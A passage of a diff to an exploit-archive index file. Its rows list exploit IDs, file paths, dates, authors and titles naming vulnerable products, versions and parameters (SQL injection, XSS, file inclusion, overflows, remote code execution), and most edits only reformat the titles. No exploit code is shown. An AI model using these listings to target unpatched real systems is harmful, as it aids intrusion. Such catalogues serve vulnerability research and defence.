Vulnerability",2008-04-24,ZoRLu,php,webapps,0 +31703,platforms/php/webapps/31703.txt,"Pixel Motion Blog - 'list_article.php' Cross-Site Scripting Vulnerability",2008-04-24,ZoRLu,php,webapps,0 +31704,platforms/php/webapps/31704.txt,"PHCDownload 1.1 - admin/index.php hash Parameter SQL Injection",2008-04-24,ZoRLu,php,webapps,0 +31705,platforms/php/webapps/31705.txt,"PHCDownload 1.1 - upload/install/index.php step Parameter XSS",2008-04-24,ZoRLu,php,webapps,0 +31706,platforms/unix/remote/31706.txt,"IBM Lotus Expeditor 6.1 - URI Handler Command Execution Vulnerability",2008-04-24,"Thomas Pollet",unix,remote,0 31707,platforms/windows/dos/31707.txt,"Computer Associates ARCserve Backup Discovery Service Remote - Denial Of Service Vulnerability",2008-04-24,"Luigi Auriemma",windows,dos,0 -31708,platforms/php/webapps/31708.txt,"Joomla Visites 1.1 Component mosConfig_absolute_path Remote File Include Vulnerability",2008-04-26,NoGe,php,webapps,0 -31709,platforms/php/webapps/31709.txt,"Siteman 2.0.x2 'module' Parameter Cross-Site Scripting and Local File Include Vulnerability",2008-04-26,IRCRASH,php,webapps,0 +31708,platforms/php/webapps/31708.txt,"Joomla Visites 1.1 - Component mosConfig_absolute_path Remote File Include Vulnerability",2008-04-26,NoGe,php,webapps,0 +31709,platforms/php/webapps/31709.txt,"Siteman 2.0.x2 - 'module' Parameter Cross-Site Scripting and Local File Include Vulnerability",2008-04-26,IRCRASH,php,webapps,0 31710,platforms/novell/dos/31710.txt,"Novell GroupWise 7.0 - HTML Injection and Denial of Service Vulnerabilities",2008-04-26,"Juan Pablo Lopez Yacubian",novell,dos,0 -31711,platforms/windows/dos/31711.html,"Microsoft Excel 2007 JavaScript Code Remote Denial Of Service Vulnerability",2008-04-26,"Juan Pablo Lopez Yacubian",windows,dos,0 -31712,platforms/php/webapps/31712.txt,"miniBB 2.2 'bb_admin.php' Cross-Site Scripting Vulnerability",2008-04-28,IRCRASH,php,webapps,0 -31713,platforms/linux/dos/31713.py,"PeerCast 0.1218 'getAuthUserPass' Multiple Buffer Overflow Vulnerabilities",2008-04-29,"Nico Golde",linux,dos,0 -31714,platforms/php/webapps/31714.txt,"C-News 1.0.1'install.php' Cross Site Scripting Vulnerability",2008-04-30,ZoRLu,php,webapps,0 -31715,platforms/multiple/remote/31715.pl,"Castle Rock Computing SNMPc <= 7.0.19 Community String Stack Based Buffer Overflow Vulnerability",2008-11-11,"raveen Darshanam",multiple,remote,0 -31716,platforms/php/webapps/31716.txt,"VWar 1.6.1 R2 Multiple Remote Vulnerabilities",2008-05-01,"Darren McDonald",php,webapps,0 -31717,platforms/php/webapps/31717.txt,"MJGUEST 6.7 QT 'mjguest.php' Cross Site Scripting Vulnerability",2008-05-01,IRCRASH,php,webapps,0 -31718,platforms/php/webapps/31718.txt,"CoronaMatrix phpAddressBook 2.0 'username' Cross Site Scripting Vulnerability",2008-05-01,IRCRASH,php,webapps,0 -31719,platforms/php/webapps/31719.pl,"KnowledgeQuest 2.6 Administration Multiple Authentication Bypass Vulnerabilities",2008-05-02,Cod3rZ,php,webapps,0 -31720,platforms/php/webapps/31720.txt,"QT-cute QuickTalk Guestbook 1.6 Multiple Cross-Site Scripting Vulnerabilities",2008-05-02,ZoRLu,php,webapps,0 -31721,platforms/php/webapps/31721.txt,"EJ3 BlackBook 1.0 footer.php Multiple Parameter XSS",2008-05-02,IRCRASH,php,webapps,0 -31722,platforms/php/webapps/31722.txt,"EJ3 BlackBook 1.0 header.php Multiple Parameter XSS",2008-05-02,IRCRASH,php,webapps,0 -31723,platforms/php/webapps/31723.txt,"Alumni 1.0.8/1.0.9 info.php id Parameter SQL Injection",2008-05-02,hadihadi,php,webapps,0 -31724,platforms/php/webapps/31724.txt,"Alumni 1.0.8/1.0.9 index.php year Parameter XSS",2008-05-02,hadihadi,php,webapps,0 -31725,platforms/php/webapps/31725.txt,"Zen Cart 2008 index.php keyword Parameter SQL Injection",2008-05-02,"Ivan Sanchez",php,webapps,0 -31726,platforms/php/webapps/31726.txt,"Zen Cart 2008 index.php keyword Parameter XSS",2008-05-02,"Ivan Sanchez",php,webapps,0 -31727,platforms/php/webapps/31727.txt,"ChiCoMaS 2.0.4 'index.php' Cross Site Scripting Vulnerability",2008-05-02,"Hadi Kiamarsi",php,webapps,0 +31711,platforms/windows/dos/31711.html,"Microsoft Excel 2007 - JavaScript Code Remote Denial Of Service Vulnerability",2008-04-26,"Juan Pablo Lopez Yacubian",windows,dos,0 +31712,platforms/php/webapps/31712.txt,"miniBB 2.2 - 'bb_admin.php' Cross-Site Scripting Vulnerability",2008-04-28,IRCRASH,php,webapps,0 +31713,platforms/linux/dos/31713.py,"PeerCast 0.1218 - 'getAuthUserPass' Multiple Buffer Overflow Vulnerabilities",2008-04-29,"Nico Golde",linux,dos,0 +31714,platforms/php/webapps/31714.txt,"C-News 1.0.1 - 'install.php' Cross Site Scripting Vulnerability",2008-04-30,ZoRLu,php,webapps,0 +31715,platforms/multiple/remote/31715.pl,"Castle Rock Computing SNMPc <= 7.0.19 - Community String Stack Based Buffer Overflow Vulnerability",2008-11-11,"raveen Darshanam",multiple,remote,0 +31716,platforms/php/webapps/31716.txt,"VWar 1.6.1 R2 - Multiple Remote Vulnerabilities",2008-05-01,"Darren McDonald",php,webapps,0 +31717,platforms/php/webapps/31717.txt,"MJGUEST 6.7 - QT 'mjguest.php' Cross Site Scripting Vulnerability",2008-05-01,IRCRASH,php,webapps,0 +31718,platforms/php/webapps/31718.txt,"CoronaMatrix phpAddressBook 2.0 - 'username' Cross Site Scripting Vulnerability",2008-05-01,IRCRASH,php,webapps,0 +31719,platforms/php/webapps/31719.pl,"KnowledgeQuest 2.6 - Administration Multiple Authentication Bypass Vulnerabilities",2008-05-02,Cod3rZ,php,webapps,0 +31720,platforms/php/webapps/31720.txt,"QT-cute QuickTalk Guestbook 1.6 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-02,ZoRLu,php,webapps,0 +31721,platforms/php/webapps/31721.txt,"EJ3 BlackBook 1.0 - footer.php Multiple Parameter XSS",2008-05-02,IRCRASH,php,webapps,0 +31722,platforms/php/webapps/31722.txt,"EJ3 BlackBook 1.0 - header.php Multiple Parameter XSS",2008-05-02,IRCRASH,php,webapps,0 +31723,platforms/php/webapps/31723.txt,"Alumni 1.0.8/1.0.9 - info.php id Parameter SQL Injection",2008-05-02,hadihadi,php,webapps,0 +31724,platforms/php/webapps/31724.txt,"Alumni 1.0.8/1.0.9 - index.php year Parameter XSS",2008-05-02,hadihadi,php,webapps,0 +31725,platforms/php/webapps/31725.txt,"Zen Cart 2008 - index.php keyword Parameter SQL Injection",2008-05-02,"Ivan Sanchez",php,webapps,0 +31726,platforms/php/webapps/31726.txt,"Zen Cart 2008 - index.php keyword Parameter XSS",2008-05-02,"Ivan Sanchez",php,webapps,0 +31727,platforms/php/webapps/31727.txt,"ChiCoMaS 2.0.4 - 'index.php' Cross Site Scripting Vulnerability",2008-05-02,"Hadi Kiamarsi",php,webapps,0 31728,platforms/multiple/dos/31728.txt,"Call of Duty 4 1.5 - Malformed 'stats' command Denial of Service Vulnerability",2008-05-02,"Luigi Auriemma",multiple,dos,0 -31729,platforms/php/webapps/31729.pl,"SiteXS CMS 0.0.1 'upload.php' Arbitrary File Upload Vulnerability",2008-05-03,"Hadi Kiamarsi",php,webapps,0 -31730,platforms/php/webapps/31730.txt,"GEDCOM_TO_MYSQL php/prenom.php Multiple Parameter XSS",2008-05-05,ZoRLu,php,webapps,0 -31731,platforms/php/webapps/31731.txt,"GEDCOM_TO_MYSQL php/index.php nom_branche Parameter XSS",2008-05-05,ZoRLu,php,webapps,0 -31732,platforms/php/webapps/31732.txt,"GEDCOM_TO_MYSQL php/info.php Multiple Parameter XSS",2008-05-05,ZoRLu,php,webapps,0 +31729,platforms/php/webapps/31729.pl,"SiteXS CMS 0.0.1 - 'upload.php' Arbitrary File Upload Vulnerability",2008-05-03,"Hadi Kiamarsi",php,webapps,0 +31730,platforms/php/webapps/31730.txt,"GEDCOM_TO_MYSQL php/prenom.php - Multiple Parameter XSS",2008-05-05,ZoRLu,php,webapps,0 +31731,platforms/php/webapps/31731.txt,"GEDCOM_TO_MYSQL php/index.php nom_branche - Parameter XSS",2008-05-05,ZoRLu,php,webapps,0 +31732,platforms/php/webapps/31732.txt,"GEDCOM_TO_MYSQL php/info.php - Multiple Parameter XSS",2008-05-05,ZoRLu,php,webapps,0 31733,platforms/hardware/webapps/31733.txt,"My PDF Creator & DE DM 1.4 iOS - Multiple Vulnerabilities",2014-02-18,Vulnerability-Lab,hardware,webapps,50496 31735,platforms/php/webapps/31735.txt,"Concrete5 5.6.2.1 (index.php, cID param) - SQL Injection",2014-02-18,killall-9,php,webapps,80 31736,platforms/windows/remote/31736.py,"Ultra Mini HTTPD 1.21 - POST Request Stack Buffer Overflow",2014-02-18,Sumit,windows,remote,80 -31737,platforms/windows/remote/31737.rb,"Oracle Forms and Reports Remote Code Execution",2014-02-18,metasploit,windows,remote,0 -31738,platforms/php/webapps/31738.txt,"Open Web Analytics 1.5.4 (owa_email_address param) - SQL Injection Vulnerability",2014-02-18,"Dana James Traversie",php,webapps,0 -31739,platforms/php/webapps/31739.txt,"TLM CMS 1.1 'index.php' Multiple SQL Injection Vulnerabilities",2008-05-05,ZoRLu,php,webapps,0 -31740,platforms/php/webapps/31740.html,"LifeType 1.2.8 'admin.php' Cross Site Scripting Vulnerability",2008-05-05,"Khashayar Fereidani",php,webapps,0 -31741,platforms/php/webapps/31741.txt,"Maian Uploader 4.0 index.php keywords Parameter XSS",2008-05-05,"Khashayar Fereidani",php,webapps,0 -31742,platforms/php/webapps/31742.txt,"Maian Uploader 4.0 admin/index.php keywords Parameter XSS",2008-05-05,"Khashayar Fereidani",php,webapps,0 -31743,platforms/php/webapps/31743.txt,"Maian Uploader 4.0 admin/inc/header.php Multiple Parameter XSS",2008-05-05,"Khashayar Fereidani",php,webapps,0 -31744,platforms/php/webapps/31744.txt,"osCommerce 2.1/2.2 Multiple Cross-Site Scripting Vulnerabilities",2008-05-05,"David Sopas Ferreira",php,webapps,0 -31745,platforms/php/webapps/31745.txt,"BatmanPorTaL uyeadmin.asp id Parameter SQL Injection",2008-05-05,U238,php,webapps,0 -31746,platforms/php/webapps/31746.txt,"BatmanPorTaL profil.asp id Parameter SQL Injection",2008-05-05,U238,php,webapps,0 -31747,platforms/php/webapps/31747.pl,"iGaming CMS 1.5 'poll_vote.php' SQL Injection Vulnerability",2008-05-05,Cod3rZ,php,webapps,0 -31748,platforms/windows/dos/31748.txt,"Yahoo! Assistant 3.6 'yNotifier.dll' ActiveX Control Memory Corruption Vulnerability",2008-05-06,Sowhat,windows,dos,0 -31750,platforms/php/webapps/31750.txt,"QTO File Manager 1.0 'qtofm.php' Arbitrary File Upload Vulnerability",2008-05-06,"CrAzY CrAcKeR",php,webapps,0 -31751,platforms/php/webapps/31751.txt,"Sphider 1.3.4 'query' Parameter Cross-Site Scripting Vulnerability",2008-05-06,"Christian Holler",php,webapps,0 -31752,platforms/php/webapps/31752.txt,"Forum Rank System 6 'settings['locale']' Parameter Multiple Local File Include Vulnerabilities",2008-05-07,Matrix86,php,webapps,0 -31753,platforms/php/webapps/31753.txt,"Tux CMS 0.1 Multiple Cross-Site Scripting Vulnerabilities",2008-05-07,"Hadi Kiamarsi",php,webapps,0 -31754,platforms/cgi/webapps/31754.txt,"SAP Internet Transaction Server 6200.1017.50954.0 Bu WGate wgate.dll ~service Parameter XSS",2008-05-08,Portcullis,cgi,webapps,0 -31755,platforms/cgi/webapps/31755.txt,"SAP Internet Transaction Server 6200.1017.50954.0 Bu query String Javascript Splicing XSS",2008-05-08,Portcullis,cgi,webapps,0 -31756,platforms/multiple/remote/31756.txt,"SonicWALL Email Security 6.1.1 Error Page Cross-Site Scripting Vulnerability",2008-05-08,"Deniz Cevik",multiple,remote,0 -31757,platforms/multiple/remote/31757.txt,"ZyWALL 100 HTTP Referer Header Cross Site Scripting Vulnerability",2008-05-08,"Deniz Cevik",multiple,remote,0 -31758,platforms/hardware/remote/31758.py,"WRT120N 1.0.0.7 Stack Overflow",2014-02-19,"Craig Heffner",hardware,remote,80 -31759,platforms/windows/remote/31759.txt,"Microsoft Internet Explorer 2.0 UTF-7 HTTP Response Handling Weakness",2008-05-08,"Yaniv Miron",windows,remote,0 +31737,platforms/windows/remote/31737.rb,"Oracle Forms and Reports - Remote Code Execution",2014-02-18,metasploit,windows,remote,0 +31738,platforms/php/webapps/31738.txt,"Open Web Analytics 1.5.4 - (owa_email_address param) - SQL Injection Vulnerability",2014-02-18,"Dana James Traversie",php,webapps,0 +31739,platforms/php/webapps/31739.txt,"TLM CMS 1.1 - 'index.php' Multiple SQL Injection Vulnerabilities",2008-05-05,ZoRLu,php,webapps,0 +31740,platforms/php/webapps/31740.html,"LifeType 1.2.8 - 'admin.php' Cross Site Scripting Vulnerability",2008-05-05,"Khashayar Fereidani",php,webapps,0 +31741,platforms/php/webapps/31741.txt,"Maian Uploader 4.0 - index.php keywords Parameter XSS",2008-05-05,"Khashayar Fereidani",php,webapps,0 +31742,platforms/php/webapps/31742.txt,"Maian Uploader 4.0 - admin/index.php keywords Parameter XSS",2008-05-05,"Khashayar Fereidani",php,webapps,0 +31743,platforms/php/webapps/31743.txt,"Maian Uploader 4.0 - admin/inc/header.php Multiple Parameter XSS",2008-05-05,"Khashayar Fereidani",php,webapps,0 +31744,platforms/php/webapps/31744.txt,"osCommerce 2.1/2.2 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-05,"David Sopas Ferreira",php,webapps,0 +31745,platforms/php/webapps/31745.txt,"BatmanPorTaL - uyeadmin.asp id Parameter SQL Injection",2008-05-05,U238,php,webapps,0 +31746,platforms/php/webapps/31746.txt,"BatmanPorTaL - profil.asp id Parameter SQL Injection",2008-05-05,U238,php,webapps,0 +31747,platforms/php/webapps/31747.pl,"iGaming CMS 1.5 - 'poll_vote.php' SQL Injection Vulnerability",2008-05-05,Cod3rZ,php,webapps,0 +31748,platforms/windows/dos/31748.txt,"Yahoo! Assistant 3.6 - 'yNotifier.dll' ActiveX Control Memory Corruption Vulnerability",2008-05-06,Sowhat,windows,dos,0 +31750,platforms/php/webapps/31750.txt,"QTO File Manager 1.0 - 'qtofm.php' Arbitrary File Upload Vulnerability",2008-05-06,"CrAzY CrAcKeR",php,webapps,0 +31751,platforms/php/webapps/31751.txt,"Sphider 1.3.4 - 'query' Parameter Cross-Site Scripting Vulnerability",2008-05-06,"Christian Holler",php,webapps,0 +31752,platforms/php/webapps/31752.txt,"Forum Rank System 6 - 'settings['locale']' Parameter Multiple Local File Include Vulnerabilities",2008-05-07,Matrix86,php,webapps,0 +31753,platforms/php/webapps/31753.txt,"Tux CMS 0.1 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-07,"Hadi Kiamarsi",php,webapps,0 +31754,platforms/cgi/webapps/31754.txt,"SAP Internet Transaction Server 6200.1017.50954.0 - Bu WGate wgate.dll ~service Parameter XSS",2008-05-08,Portcullis,cgi,webapps,0 +31755,platforms/cgi/webapps/31755.txt,"SAP Internet Transaction Server 6200.1017.50954.0 - Bu query String Javascript Splicing XSS",2008-05-08,Portcullis,cgi,webapps,0 +31756,platforms/multiple/remote/31756.txt,"SonicWALL Email Security 6.1.1 - Error Page Cross-Site Scripting Vulnerability",2008-05-08,"Deniz Cevik",multiple,remote,0 +31757,platforms/multiple/remote/31757.txt,"ZyWALL 100 HTTP Referer Header - Cross Site Scripting Vulnerability",2008-05-08,"Deniz Cevik",multiple,remote,0 +31758,platforms/hardware/remote/31758.py,"WRT120N 1.0.0.7 - Stack Overflow",2014-02-19,"Craig Heffner",hardware,remote,80 +31759,platforms/windows/remote/31759.txt,"Microsoft Internet Explorer 2.0 - UTF-7 HTTP Response Handling Weakness",2008-05-08,"Yaniv Miron",windows,remote,0 31760,platforms/windows/webapps/31760.txt,"Lotus Sametime 8.5.1 - Password Disclosure",2014-02-19,"Adriano Marcio Monteiro",windows,webapps,5081 +31761,platforms/linux/dos/31761.txt,"Embedthis Goahead Webserver 3.1.3-0 - Multiple Vulnerabilities",2014-02-19,"Maksymilian Motyl",linux,dos,80 31762,platforms/windows/dos/31762.py,"Catia V5-6R2013 ""CATV5_AllApplications"" - Stack Buffer Overflow",2014-02-19,"Mohamed Shetta",windows,dos,55555 31763,platforms/windows/dos/31763.py,"SolidWorks Workgroup PDM 2014 SP2 Opcode 2001 - Denial of Service",2014-02-19,"Mohamed Shetta",windows,dos,30000 31764,platforms/hardware/webapps/31764.txt,"Dlink DIR-615 Hardware vE4 Firmware v5.10 - CSRF Vulnerability",2014-02-19,"Dhruv Shah",hardware,webapps,80 31765,platforms/hardware/webapps/31765.txt,"Barracuda Message Archiver 650 - Persistent XSS Vulnerability",2014-02-19,Vulnerability-Lab,hardware,webapps,3378 -31766,platforms/windows/local/31766.rb,"Audiotran PLS File Stack Buffer Overflow",2014-02-19,metasploit,windows,local,0 -31767,platforms/multiple/remote/31767.rb,"MediaWiki Thumb.php Remote Command Execution",2014-02-19,metasploit,multiple,remote,80 +31766,platforms/windows/local/31766.rb,"Audiotran - (.PLS File) Stack Buffer Overflow",2014-02-19,metasploit,windows,local,0 +31767,platforms/multiple/remote/31767.rb,"MediaWiki Thumb.php - Remote Command Execution",2014-02-19,metasploit,multiple,remote,80 31768,platforms/php/webapps/31768.txt,"Wordpress BP Group Documents Plugin 1.2.1 - Multiple Vulnerabilities",2014-02-19,"Tom Adams",php,webapps,80 -31769,platforms/windows/remote/31769.html,"Ourgame 'GLIEDown2.dll' ActiveX Control Remote Code Execution Vulnerability",2008-05-08,anonymous,windows,remote,0 -31770,platforms/multiple/remote/31770.txt,"Oracle Application Server Portal 10g Authentication Bypass Vulnerability",2008-05-09,"Deniz Cevik",multiple,remote,0 -31771,platforms/php/webapps/31771.txt,"cPanel 11.x scripts2/knowlegebase issue Parameter XSS",2008-05-09,"Matteo Carli",php,webapps,0 -31772,platforms/php/webapps/31772.txt,"cPanel 11.x scripts2/changeip user Parameter XSS",2008-05-09,"Matteo Carli",php,webapps,0 -31773,platforms/php/webapps/31773.txt,"cPanel 11.x scripts2/listaccts search Parameter XSS",2008-05-09,"Matteo Carli",php,webapps,0 -31774,platforms/php/webapps/31774.txt,"BlogPHP 2.0 index.php Multiple Parameter XSS",2008-05-10,"David Sopas Ferreira",php,webapps,0 -31775,platforms/php/webapps/31775.txt,"OtherLogic 'vocourse.php' SQL Injection Vulnerability",2008-05-10,Breeeeh,php,webapps,0 -31776,platforms/php/webapps/31776.txt,"WordPress WP Photo Album Plugin 'photo' Parameter SQL Injection Vulnerability",2008-05-09,THE_MILLER,php,webapps,0 -31777,platforms/php/webapps/31777.txt,"AJ Classifieds 'index.php' SQL Injection Vulnerability",2008-05-12,t0pP8uZz,php,webapps,0 -31778,platforms/php/webapps/31778.txt,"phpInstantGallery 2.0 index.php gallery Parameter XSS",2008-05-12,ZoRLu,php,webapps,0 -31779,platforms/php/webapps/31779.txt,"phpInstantGallery 2.0 image.php Multiple Parameter XSS",2008-05-12,ZoRLu,php,webapps,0 -31780,platforms/php/webapps/31780.txt,"CyrixMED 1.4 'index.php' Cross Site Scripting Vulnerability",2008-05-12,ZoRLu,php,webapps,0 -31781,platforms/php/webapps/31781.txt,"IBD Micro CMS 3.5 'microcms-admin-login.php' Multiple SQL Injection Vulnerabilities",2008-05-12,SkyOut,php,webapps,0 -31782,platforms/php/webapps/31782.txt,"Claroline <= 1.7.5 Multiple Remote File Include Vulnerabilities",2008-05-12,MajnOoNxHaCkEr,php,webapps,0 -31783,platforms/php/webapps/31783.txt,"Fusebox 5.5.1 'fusebox5.php' Remote File Include Vulnerability",2008-05-12,MajnOoNxHaCkEr,php,webapps,0 -31784,platforms/php/webapps/31784.txt,"PhpMyAgenda 2.1 'infoevent.php3' Remote File Include Vulnerability",2008-05-12,MajnOoNxHaCkEr,php,webapps,0 -31785,platforms/multiple/dos/31785.txt,"Multiple Platform IPv6 Address Publication Denial of Service Vulnerabilities",2008-05-13,"Tyler Reguly",multiple,dos,0 -31786,platforms/asp/webapps/31786.txt,"Cisco BBSM Captive Portal 5.3 'AccesCodeStart.asp' Cross-Site Scripting Vulnerability",2008-05-13,"Brad Antoniewicz",asp,webapps,0 -31787,platforms/php/webapps/31787.txt,"Kalptaru Infotech Automated Link Exchange Portal 'linking.page.php' SQL Injection Vulnerability",2008-05-13,HaCkeR_EgY,php,webapps,0 -31788,platforms/windows/remote/31788.py,"VideoCharge Studio 2.12.3.685 GetHttpResponse() - MITM Remote Code Execution Exploit",2014-02-20,"Julien Ahrens",windows,remote,0 +31769,platforms/windows/remote/31769.html,"Ourgame 'GLIEDown2.dll' ActiveX Control - Remote Code Execution Vulnerability",2008-05-08,anonymous,windows,remote,0 +31770,platforms/multiple/remote/31770.txt,"Oracle Application Server Portal 10g - Authentication Bypass Vulnerability",2008-05-09,"Deniz Cevik",multiple,remote,0 +31771,platforms/php/webapps/31771.txt,"cPanel 11.x - scripts2/knowlegebase issue Parameter XSS",2008-05-09,"Matteo Carli",php,webapps,0 +31772,platforms/php/webapps/31772.txt,"cPanel 11.x - scripts2/changeip user Parameter XSS",2008-05-09,"Matteo Carli",php,webapps,0 +31773,platforms/php/webapps/31773.txt,"cPanel 11.x - scripts2/listaccts search Parameter XSS",2008-05-09,"Matteo Carli",php,webapps,0 +31774,platforms/php/webapps/31774.txt,"BlogPHP 2.0 - index.php Multiple Parameter XSS",2008-05-10,"David Sopas Ferreira",php,webapps,0 +31775,platforms/php/webapps/31775.txt,"OtherLogic - 'vocourse.php' SQL Injection Vulnerability",2008-05-10,Breeeeh,php,webapps,0 +31776,platforms/php/webapps/31776.txt,"WordPress WP Photo Album Plugin - 'photo' Parameter SQL Injection Vulnerability",2008-05-09,THE_MILLER,php,webapps,0 +31777,platforms/php/webapps/31777.txt,"AJ Classifieds - 'index.php' SQL Injection Vulnerability",2008-05-12,t0pP8uZz,php,webapps,0 +31778,platforms/php/webapps/31778.txt,"phpInstantGallery 2.0 - index.php gallery Parameter XSS",2008-05-12,ZoRLu,php,webapps,0 +31779,platforms/php/webapps/31779.txt,"phpInstantGallery 2.0 - image.php Multiple Parameter XSS",2008-05-12,ZoRLu,php,webapps,0 +31780,platforms/php/webapps/31780.txt,"CyrixMED 1.4 - 'index.php' Cross Site Scripting Vulnerability",2008-05-12,ZoRLu,php,webapps,0 +31781,platforms/php/webapps/31781.txt,"IBD Micro CMS 3.5 - 'microcms-admin-login.php' Multiple SQL Injection Vulnerabilities",2008-05-12,SkyOut,php,webapps,0 +31782,platforms/php/webapps/31782.txt,"Claroline <= 1.7.5 - Multiple Remote File Include Vulnerabilities",2008-05-12,MajnOoNxHaCkEr,php,webapps,0 +31783,platforms/php/webapps/31783.txt,"Fusebox 5.5.1 - 'fusebox5.php' Remote File Include Vulnerability",2008-05-12,MajnOoNxHaCkEr,php,webapps,0 +31784,platforms/php/webapps/31784.txt,"PhpMyAgenda 2.1 - 'infoevent.php3' Remote File Include Vulnerability",2008-05-12,MajnOoNxHaCkEr,php,webapps,0 +31785,platforms/multiple/dos/31785.txt,"Multiple Platform IPv6 Address Publication - Denial of Service Vulnerabilities",2008-05-13,"Tyler Reguly",multiple,dos,0 +31786,platforms/asp/webapps/31786.txt,"Cisco BBSM Captive Portal 5.3 - 'AccesCodeStart.asp' Cross-Site Scripting Vulnerability",2008-05-13,"Brad Antoniewicz",asp,webapps,0 +31787,platforms/php/webapps/31787.txt,"Kalptaru Infotech Automated Link Exchange Portal - 'linking.page.php' SQL Injection Vulnerability",2008-05-13,HaCkeR_EgY,php,webapps,0 +31788,platforms/windows/remote/31788.py,"VideoCharge Studio 2.12.3.685 - GetHttpResponse() MITM Remote Code Execution Exploit",2014-02-20,"Julien Ahrens",windows,remote,0 31789,platforms/windows/remote/31789.py,"PCMAN FTP 2.07 - Buffer Overflow Exploit",2014-02-20,Sumit,windows,remote,21 31790,platforms/hardware/webapps/31790.txt,"Barracuda Firewall 6.1.0.016 - Multiple Vulnerabilities",2014-02-20,Vulnerability-Lab,hardware,webapps,0 31791,platforms/windows/dos/31791.py,"Catia V5-6R2013 ""CATV5_Backbone_Bus"" - Stack Buffer Overflow",2014-02-20,"Mohamed Shetta",windows,dos,55555 31792,platforms/php/webapps/31792.txt,"Stark CRM 1.0 - Multiple Vulnerabilities",2014-02-20,LiquidWorm,php,webapps,80 -31793,platforms/php/webapps/31793.txt,"Horde Turba 3.1.7 Multiple Cross-Site Scripting Vulnerabilities",2008-05-14,"Ivan Javier Sanchez",php,webapps,0 -31794,platforms/php/webapps/31794.txt,"PicsEngine 1.0 'index.php' Cross Site Scripting Vulnerability",2008-05-14,ZoRLu,php,webapps,0 -31795,platforms/php/webapps/31795.txt,"Links Pile 'link.php' SQL Injection Vulnerability",2008-08-14,HaCkeR_EgY,php,webapps,0 -31796,platforms/php/webapps/31796.txt,"Internet Photoshow 'login_admin' Parameter Unauthorized Access Vulnerability",2008-05-14,t0pP8uZz,php,webapps,0 -31797,platforms/asp/webapps/31797.txt,"Philboard 0.5 W1L3D4_foruma_yeni_konu_ac.asp forumid Parameter SQL Injection",2008-05-14,U238,asp,webapps,0 -31798,platforms/php/webapps/31798.txt,"Philboard 0.5 W1L3D4_konuoku.asp id Parameter SQL Injection",2008-05-14,U238,php,webapps,0 -31799,platforms/php/webapps/31799.txt,"Philboard 0.5 W1L3D4_konuya_mesaj_yaz.asp Multiple Parameter SQL Injection",2008-05-14,U238,php,webapps,0 -31800,platforms/php/webapps/31800.pl,"SunShop Shopping Cart <= 3.5.1 'index.php' SQL Injection Vulnerability",2008-05-15,irvian,php,webapps,0 -31801,platforms/php/webapps/31801.txt,"ACGV News 0.9.1 glossaire.php id Parameter SQL Injection",2008-05-16,ZoRLu,php,webapps,0 -31802,platforms/php/webapps/31802.txt,"ACGV News 0.9.1 glossaire.php id Parameter XSS",2008-05-16,ZoRLu,php,webapps,0 -31803,platforms/php/webapps/31803.txt,"AN Guestbook 0.4 'send_email.php' Cross Site Scripting Vulnerability",2008-05-16,ZoRLu,php,webapps,0 -31804,platforms/php/webapps/31804.txt,"Digital Hive 2.0 'base_include.php' Local File Include Vulnerability",2008-05-16,ZoRLu,php,webapps,0 -31805,platforms/php/webapps/31805.txt,"PHP-Nuke 'KuiraniKerim' Module 'sid' Parameter SQL Injection Vulnerability",2008-05-17,Lovebug,php,webapps,0 -31806,platforms/php/webapps/31806.txt,"bcoos 1.0.13 'file' Parameter Local File Include Vulnerability",2008-05-19,Lostmon,php,webapps,0 -31807,platforms/php/webapps/31807.txt,"cPanel <= 11.21 'wwwact' Remote Privilege Escalation Vulnerability",2008-05-19,"Ali Jasbi",php,webapps,0 -31808,platforms/php/webapps/31808.txt,"AppServ Open Project <= 2.5.10 'appservlang' Parameter Cross Site Scripting Vulnerability",2008-05-20,"CWH Underground",php,webapps,0 -31809,platforms/php/webapps/31809.txt,"Starsgames Control Panel 4.6.2 'index.php' Cross Site Scripting Vulnerability",2008-05-20,"CWH Underground",php,webapps,0 -31810,platforms/php/webapps/31810.txt,"Web Slider 0.6 'slide' Parameter SQL Injection Vulnerability",2008-05-20,"fahn zichler",php,webapps,0 -31811,platforms/asp/webapps/31811.txt,"Site Tanitimlari Scripti Multiple SQL Injection Vulnerabilities",2008-05-20,"fahn zichler",asp,webapps,0 -31812,platforms/asp/webapps/31812.txt,"DizaynPlus Nobetci Eczane Takip 1.0 'ayrinti.asp' Parameter SQL Injection Vulnerability",2008-05-20,U238,asp,webapps,0 -31813,platforms/php/webapps/31813.txt,"eCMS 0.4.2 Multiple Security Vulnerabilities",2008-05-20,hadihadi,php,webapps,0 +31793,platforms/php/webapps/31793.txt,"Horde Turba 3.1.7 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-14,"Ivan Javier Sanchez",php,webapps,0 +31794,platforms/php/webapps/31794.txt,"PicsEngine 1.0 - 'index.php' Cross Site Scripting Vulnerability",2008-05-14,ZoRLu,php,webapps,0 +31795,platforms/php/webapps/31795.txt,"Links Pile - 'link.php' SQL Injection Vulnerability",2008-08-14,HaCkeR_EgY,php,webapps,0 +31796,platforms/php/webapps/31796.txt,"Internet Photoshow - 'login_admin' Parameter Unauthorized Access Vulnerability",2008-05-14,t0pP8uZz,php,webapps,0 +31797,platforms/asp/webapps/31797.txt,"Philboard 0.5 - W1L3D4_foruma_yeni_konu_ac.asp forumid Parameter SQL Injection",2008-05-14,U238,asp,webapps,0 +31798,platforms/php/webapps/31798.txt,"Philboard 0.5 - W1L3D4_konuoku.asp id Parameter SQL Injection",2008-05-14,U238,php,webapps,0 +31799,platforms/php/webapps/31799.txt,"Philboard 0.5 - W1L3D4_konuya_mesaj_yaz.asp Multiple Parameter SQL Injection",2008-05-14,U238,php,webapps,0 +31800,platforms/php/webapps/31800.pl,"SunShop Shopping Cart <= 3.5.1 - 'index.php' SQL Injection Vulnerability",2008-05-15,irvian,php,webapps,0 +31801,platforms/php/webapps/31801.txt,"ACGV News 0.9.1 - glossaire.php id Parameter SQL Injection",2008-05-16,ZoRLu,php,webapps,0 +31802,platforms/php/webapps/31802.txt,"ACGV News 0.9.1 - glossaire.php id Parameter XSS",2008-05-16,ZoRLu,php,webapps,0 +31803,platforms/php/webapps/31803.txt,"AN Guestbook 0.4 - 'send_email.php' Cross Site Scripting Vulnerability",2008-05-16,ZoRLu,php,webapps,0 +31804,platforms/php/webapps/31804.txt,"Digital Hive 2.0 - 'base_include.php' Local File Include Vulnerability",2008-05-16,ZoRLu,php,webapps,0 +31805,platforms/php/webapps/31805.txt,"PHP-Nuke 'KuiraniKerim' Module - 